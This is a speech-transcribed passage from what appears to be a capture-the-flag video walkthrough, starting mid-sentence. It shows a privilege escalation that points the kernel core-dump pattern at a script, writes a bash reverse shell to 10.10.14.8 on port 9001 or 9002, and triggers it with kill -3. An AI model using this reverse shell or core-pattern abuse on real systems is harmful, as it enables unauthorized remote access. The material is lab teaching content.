do -d dev shm to put it in that directory. We get a new error message, file name, which we should have known because if we look at the next thing, we have file name here. So let's search up, and it's F, case F. So I do -f, and I'll put please subscribe as the file name. And we get no namespace specified for pinning. So I'm going to search no namespace, and we have to look for this num unshares. And I don't see it being set here. Oh, capital U, right here. So I'm going to do -u. And we have failed to bind on mount, but if we now look at our kernel parameter, it is set to temp exploit.sh. So let's create this. So temp exploit.sh, we'll do bin bash, and then bash dash, well, we can just do bash dash I, dev tcp 10.10.14.8, 0 and 1 like that. We need to specify the port. There we go. chmod plus x, temp exploit. Let's just listen on 9001 to make sure we already are. Where are we listening? I do not know where we're listening, so let's change it to 9002. And something erased this, which is annoying. Dev TCP 10.10.14.8, 9001, 0 and 1. Wonder if we have to be quick with this. chmod plus x. I'm going to CP this. CP exploit to dev shm, just to keep a backup copy. When we execute this, bash is a bad interpreter. Bin bash and 9002. There we go. So now what we have to do is kill to create a core dump. Create core dump kill Linux. It's like we have to send it like a sig sev fault or something. Let's see. I'll try kill -3. We'll just see if it works. So if I do sleep 20 and ps-ef grep sleep, let's do kill -3 25172. That did not do it. Let's cat that proc sys core pattern real quick. Of course, it reset. It's back. So let's sleep. I can probably just kill -3 25181. There we go. Now it executed the shell. So again, when we said kill with that special parameter, that's what told it to do the core dump. And since we edited the kernel parameter, instead of sending the core dump out to canonical or wherever it sends it to, it executed a reverse shell. So that'll be the box. Hope you guys enjoyed. Take care, and I'll see you all next time.